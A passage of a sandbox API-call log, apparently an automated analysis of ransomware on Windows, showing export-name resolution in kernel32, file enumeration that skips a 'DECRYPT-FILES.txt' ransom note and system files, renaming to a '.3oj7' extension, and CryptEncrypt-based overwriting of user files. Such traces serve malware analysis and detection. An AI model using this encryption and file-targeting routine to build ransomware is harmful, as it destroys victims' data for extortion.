lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.198] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.198] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.198] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.198] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.199] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.199] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.199] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.199] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.199] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.199] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.199] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.199] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.199] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.199] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.199] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.199] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.199] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.199] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.199] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.199] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.199] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.199] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.199] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.200] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.200] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.200] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.200] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.200] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.200] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.200] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.200] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.200] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.200] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.200] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.200] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.200] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.200] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.200] lstrlenA (lpString="DELETEATOM") returned 10 [0087.200] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.201] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.201] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.201] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.201] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.201] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.201] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.201] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.201] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.201] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.201] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.201] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.201] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.201] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.201] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.201] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.201] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.201] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.201] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.201] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.202] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.202] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.202] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.202] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.202] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.202] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.202] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.202] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.202] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.202] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.202] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.202] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.202] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.202] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.202] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.202] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.202] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.202] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.202] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.203] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.203] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.203] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.203] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.203] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.203] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.203] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.203] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.203] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.203] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi") returned 45 [0087.203] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi.3oj7") returned 50 [0087.203] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k-qq.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi.3oj7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k-qq.avi.3oj7"), dwFlags=0x0) returned 1 [0087.204] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.204] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.204] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.204] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31e5e6f0, ftCreationTime.dwHighDateTime=0x1d4c56b, ftLastAccessTime.dwLowDateTime=0xe11cdea0, ftLastAccessTime.dwHighDateTime=0x1d4c578, ftLastWriteTime.dwLowDateTime=0xe11cdea0, ftLastWriteTime.dwHighDateTime=0x1d4c578, nFileSizeHigh=0x0, nFileSizeLow=0x1763e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lk3NhPIapGop5jrw2r.mp4", cAlternateFileName="LK3NHP~1.MP4")) returned 1 [0087.204] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0087.204] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="autorun.inf") returned 1 [0087.204] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="boot.ini") returned 1 [0087.205] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="desktop.ini") returned 1 [0087.205] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="ntuser.dat") returned -1 [0087.205] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="iconcache.db") returned 1 [0087.205] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="bootsect.bak") returned 1 [0087.205] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="ntuser.dat.log") returned -1 [0087.205] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="thumbs.db") returned -1 [0087.205] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4", lpString2="Bootfont.bin") returned 1 [0087.205] lstrlenW (lpString="Lk3NhPIapGop5jrw2r.mp4") returned 22 [0087.205] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0087.205] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0087.205] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0087.205] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0087.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.205] lstrlenW (lpString="Lk3NhPIapGop5jrw2r.mp4") returned 22 [0087.205] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Lk3NhPIapGop5jrw2r.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4" [0087.205] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lk3nhpiapgop5jrw2r.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.205] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=95806) returned 1 [0087.205] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.205] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.206] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.206] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.206] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.206] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.206] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.208] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.208] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.209] CloseHandle (hObject=0x414) returned 1 [0087.209] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.209] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.210] CloseHandle (hObject=0x0) returned 0 [0087.210] CloseHandle (hObject=0x410) returned 1 [0087.210] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.210] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.211] GetTickCount () returned 0x114e3f9 [0087.211] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.211] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.211] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.211] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.211] lstrlenA (lpString="kernel32.dll") returned 12 [0087.212] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.212] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.212] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.212] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.212] lstrlenA (lpString="ADDATOMA") returned 8 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.212] lstrlenA (lpString="ADDATOMW") returned 8 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.212] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.212] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.212] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.212] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.212] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.212] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.212] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.212] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") 